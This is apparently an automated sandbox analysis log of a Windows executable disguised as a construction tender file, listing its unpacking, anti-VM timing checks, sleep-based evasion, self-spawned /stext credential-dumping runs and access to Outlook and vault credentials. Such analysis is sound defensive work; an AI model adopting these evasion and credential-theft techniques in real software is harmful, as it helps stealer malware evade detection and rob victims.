              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile read: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_6-32983
              Source: unknownProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\osspeswmhebwmnhvszpvhldf"
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\zmfiflhnvmtjoudzbkcxkyywgeg"
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\jokafdshjuloyardsuwyvdtnhlpesm"
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded (in report order, repeats kept): version.dll, kernel.appcore.dll, uxtheme.dll, shfolder.dll, windows.storage.dll, wldp.dll, propsys.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll, wintypes.dll, wintypes.dll, textshaping.dll, profapi.dll, version.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, iphlpapi.dll, mswsock.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, winmm.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, version.dll, wininet.dll, windows.storage.dll, wldp.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, pstorec.dll, vaultcli.dll, wintypes.dll, dpapi.dll, msasn1.dll, windows.storage.dll, wldp.dll, pstorec.dll, sspicli.dll, msasn1.dll, msasn1.dll, windows.storage.dll, wldp.dll, msasn1.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile written: C:\Users\user\AppData\Local\Temp\Settings.ini
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile opened: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.cfg
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeUnpacked PE file: 5.2.Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeUnpacked PE file: 6.2.Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeUnpacked PE file: 7.2.Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: Yara matchFile source: Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 7504, type: MEMORYSTR
              Source: Yara matchFile source: 00000000.00000002.1965807835.0000000004BAA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_004062F6 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062F6
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332C1219 push esp; iretd 4_2_332C121A
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B2806 push ecx; ret 4_2_332B2819
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0044693D push ecx; ret 5_2_0044694D
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0044DB70 push eax; ret 5_2_0044DB84
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0044DB70 push eax; ret 5_2_0044DBAC
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00451D54 push eax; ret 5_2_00451D61
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_0044B090 push eax; ret 6_2_0044B0A4
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_0044B090 push eax; ret 6_2_0044B0CC
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_00444E71 push ecx; ret 6_2_00444E81
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00414060 push eax; ret 7_2_00414074
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00414060 push eax; ret 7_2_0041409C
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00414039 push ecx; ret 7_2_00414049
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_004164EB push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00416553 push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00416555 push 0000006Ah; retf 7_2_004165C4
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: \ref gec409876 construction of majlis project in saadiyat, abu dhabi.exe
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile created: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_004047CB
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeAPI/Special instruction interceptor: Address: 51229FF
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeAPI/Special instruction interceptor: Address: 1DC29FF
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeRDTSC instruction interceptor: First address: 50BB60B second address: 50BB60B instructions: 0x00000000 rdtsc 0x00000002 test ecx, ecx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FF1CD4D5384h 0x00000008 test al, bl 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c test ch, ah 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeRDTSC instruction interceptor: First address: 1D5B60B second address: 1D5B60B instructions: 0x00000000 rdtsc 0x00000002 test ecx, ecx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FF1CCCAE754h 0x00000008 test al, bl 0x0000000a inc ebp 0x0000000b inc ebx 0x0000000c test ch, ah 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeWindow / User API: threadDelayed 4069Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeWindow / User API: threadDelayed 5395Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeWindow / User API: foregroundWindowGot 1770Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeAPI coverage: 4.4 %
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeAPI coverage: 9.9 %
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe TID: 8008Thread sleep count: 250 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe TID: 8008Thread sleep time: -125000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe TID: 8012Thread sleep count: 4069 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe TID: 8012Thread sleep time: -12207000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe TID: 8012Thread sleep count: 5395 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe TID: 8012Thread sleep time: -16185000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405814
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_004062CF FindFirstFileW,FindClose,0_2_004062CF
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_00402770 FindFirstFileW,4_2_00402770
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,4_2_00405814
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_004062CF FindFirstFileW,FindClose,4_2_004062CF
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,LdrInitializeThunk,lstrlenW,LdrInitializeThunk,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,4_2_332B10F1
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_00418981 memset,GetSystemInfo,5_2_00418981
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.000000000243E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000000.00000002.1965028804.00000000007BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhv4333.tmp.5.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: bhv4333.tmp.5.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeAPI call chain: ExitProcess graph end nodegraph_0-4789
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeAPI call chain: ExitProcess graph end nodegraph_0-4794
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeAPI call chain: ExitProcess graph end nodegraph_6-33885
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_00401E51 WaitForSingleObject,LdrInitializeThunk,WaitForSingleObject,LdrInitializeThunk,WaitForSingleObject,GetExitCodeProcess,CloseHandle,0_2_00401E51
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B2639 IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_332B2639
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_004062F6 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062F6
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B4AB4 mov eax, dword ptr fs:[00000030h]4_2_332B4AB4
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B724E GetProcessHeap,4_2_332B724E
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_332B2B1C
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B2639 IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_332B2639
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B60E2 LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_332B60E2

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: NULL target: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\osspeswmhebwmnhvszpvhldf"Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\zmfiflhnvmtjoudzbkcxkyywgeg"Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\jokafdshjuloyardsuwyvdtnhlpesm"Jump to behavior
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerg
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerxe7
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2944218766.000000000249E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerk
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2944218766.000000000249E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerx
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerECT IN .
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager CONSTR)
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager<
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.drBinary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B2933 cpuid 4_2_332B2933
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_332B2264
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,6_2_004082CD
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_00405FAE GetVersion,LdrInitializeThunk,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405FAE
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              Source: Yara matchFile source: 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2942457183.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
